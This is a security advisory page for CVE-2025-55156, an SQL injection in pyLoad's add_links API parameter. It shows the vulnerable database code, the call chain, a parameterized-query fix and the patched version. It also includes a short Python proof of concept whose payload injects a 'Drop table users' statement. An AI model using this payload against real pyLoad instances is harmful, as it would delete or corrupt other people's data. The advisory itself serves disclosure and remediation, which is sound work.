CVE-2025-55156: PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter

Published Aug 11, 2025
·
Updated

Summary The parameter addlinks in the API /json/addpackage is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage.

Details - Affected file:https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/filedatabase.py#L271 - Affected code: python @style.queue def updatelinkinfo(self, data): """ data is list of tuples (name, size, status, url) """ self.c.executemany( "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)", data, ) ids = [] statuses = "','".join(x[3] for x in data) self.c.execute(f"SELECT id FROM links WHERE url IN ('{statuses}')") for r in self.c: ids.append(int(r[0])) return ids statuses is constructed from data, and data is the value of the addlinks parameter entered by the user through /json/addpackge. Because {statuses} is directly spliced into the SQL statement, it leads to the SQL injection vulnerability.

- Vulnerability Chain xml josnblueprint.py#addpackage src/pyload/core/api/init.py#addpackage src/pyload/core/managers/filemanager.py#addlinks src/pyload/core/threads/infothread.py#run src/pyload/core/threads/infothread.py#updateinfo src/pyload/core/managers/filemanager.py#updatefileinfo src/pyload/core/database/filedatabase.py#updatelinkinfo

PoC python import requests

if name == "main": url = "http://localhost:8000/json/addpackage" data = { "addname": "My Downloads1", "adddest": "0", "addlinks": "https://www.dailymotion.com/video/x8zzzzz') or 1; Drop table users;--", "addpassword": "mypassword" }

response = requests.post(url, cookies=yourcookies, data=data) print(response.statuscode, response.text) <img width="1599" height="827" alt="image" src="https://github.com/user-attachments/assets/9bdcef37-59b8-4e60-a2b5-beb8a88c3202" />

Remediation python def updatelinkinfo(self, data): """ data is list of tuples (name, size, status, url) """ self.c.executemany( "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)", data, ) # 提取所有url urls = [x[3] for x in data] # 构建参数化查询,避免SQL注入 placeholders = ','.join(['?'] len(urls)) query = f"SELECT id FROM links WHERE url IN ({placeholders}) AND status IN (1,2,3,14)" self.c.execute(query, urls) ids = [int(row[0]) for row in self.c.fetchall()] return ids

Impact Attackers can modify or delete data in the database, causing data errors or loss.

Other sources

pyLoad is the free and open-source Download Manager written in pure Python. Prior to version 0.5.0b3.dev91, the parameter addlinks in API /json/addpackage is vulnerable to SQL Injection. Attackers can modify or delete data in the database, causing data errors or loss. This issue has been patched in version 0.5.0b3.dev91.

— MITRE

Affected Software

2 affected componentsFixes available
pyload pyload<0.5.0b3.dev91
pip/pyload-ng<0.5.0b3.dev91
0.5.0b3.dev91

Event History

Aug 11, 2025
CVE Published
via MITRE·10:21 PM
Data Sourced
via MITRE·10:21 PM
DescriptionWeakness
Data Sourced
via NVD·11:15 PM
DescriptionSeverityWeakness
Aug 12, 2025
Advisory Published
via GitHub·12:13 AM
Data Sourced
via GitHub·12:13 AM
DescriptionWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2025-55156?

CVE-2025-55156 is considered a high-severity vulnerability due to its potential for SQL Injection which can lead to data modification and loss.

2

How do I fix CVE-2025-55156?

To fix CVE-2025-55156, update pyLoad to version 0.5.0b3.dev91 or later, which resolves the SQL Injection vulnerability.

3

Which versions of pyLoad are affected by CVE-2025-55156?

Versions of pyLoad prior to 0.5.0b3.dev91 are affected by CVE-2025-55156.

4

What type of vulnerability is CVE-2025-55156?

CVE-2025-55156 is an SQL Injection vulnerability that affects the add_links parameter in the API of pyLoad.

5

What are the potential impacts of CVE-2025-55156?

If exploited, CVE-2025-55156 could allow attackers to modify or delete database entries, leading to data errors or loss.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203